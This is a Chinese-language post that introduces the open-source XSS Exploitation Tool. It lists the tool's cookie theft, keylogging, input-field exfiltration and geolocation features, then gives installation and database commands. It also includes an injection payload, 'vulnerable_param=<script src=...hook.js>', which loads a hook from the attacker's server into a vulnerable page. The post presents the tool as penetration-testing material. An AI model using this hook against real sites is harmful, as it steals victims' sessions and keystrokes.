一款XSS利用工具

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/Sharpforce/XSS-Exploitation-Tool

XSS Exploitation Tool

相关技术点

  • XSS(Cross-Site Scripting)跨站脚本攻击漏洞
  • Apache、MySQL、PHP等Web开发技术
  • 前端JavaScript技术

项目用途

XSS Exploitation Tool是一个用于渗透测试的工具,专注于利用跨站脚本漏洞。其功能包括:

  • 获取受害者浏览器的技术数据
  • 获取受害者的地理位置
  • 获取被钩住/访问的页面的快照
  • 获取被钩住/访问的页面的源代码
  • 泄露输入字段数据
  • 泄露Cookie
  • 键盘记录
  • 显示警报框
  • 重定向用户

使用方法:

  1. 创建一个页面或利用跨站脚本漏洞将JavaScript钩子文件插入页面。
  2. 受害者访问被钩住的页面,XSS Exploitation Tool服务器会列出被钩住的浏览器。

该工具仅用于教育目的,不要用于真实环境。

XSS 漏洞利用工具

XSS 漏洞利用工具是一款专注于利用跨站脚本漏洞的渗透测试工具。

该工具仅供教育目的,不要用于真实环境

特点

  • 受害者浏览器的技术数据
  • 受害者的地理位置
  • 被钩住/访问页面的快照
  • 被钩住/访问页面的源代码
  • 泄露输入字段数据
  • 泄露 cookies
  • 按键记录
  • 显示警报框
  • 重定向用户

安装

在 Debian 11 上测试通过

您可能需要 Apache、MySQL 数据库和带有模块的 PHP:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

安装 Git 并拉取 XSS-Exploitation-Tool 源代码:

$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

安装 composer,然后安装应用程序依赖项:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

初始化数据库

$ sudo mysql

创建一个具有特定权限的新用户:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

创建数据库(将导致一个空页面):

访问页面 http://server-ip/reset_database.php

调整 JavaScript 钩子文件

文件 hook.js 是一个钩子。您需要将第一行中的 IP 地址替换为 XSS 漏洞利用工具服务器的 IP 地址:

var address = "your server ip";

工作原理

首先,创建一个页面(或利用跨站脚本漏洞)来插入 JavaScript 钩子文件(请参见根目录下的 exploit.html):

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

然后,当受害者访问被钩住的页面时,XSS 漏洞利用工具服务器应该列出被钩住的浏览器:

ad1a1b7183235253

 

屏幕截图

 

ad1a1b7183235306

ad1a1b7183235319

 

 

标签:工具分享, 渗透测试框架, 漏洞扫描器, XSS漏洞检测工具, xss攻击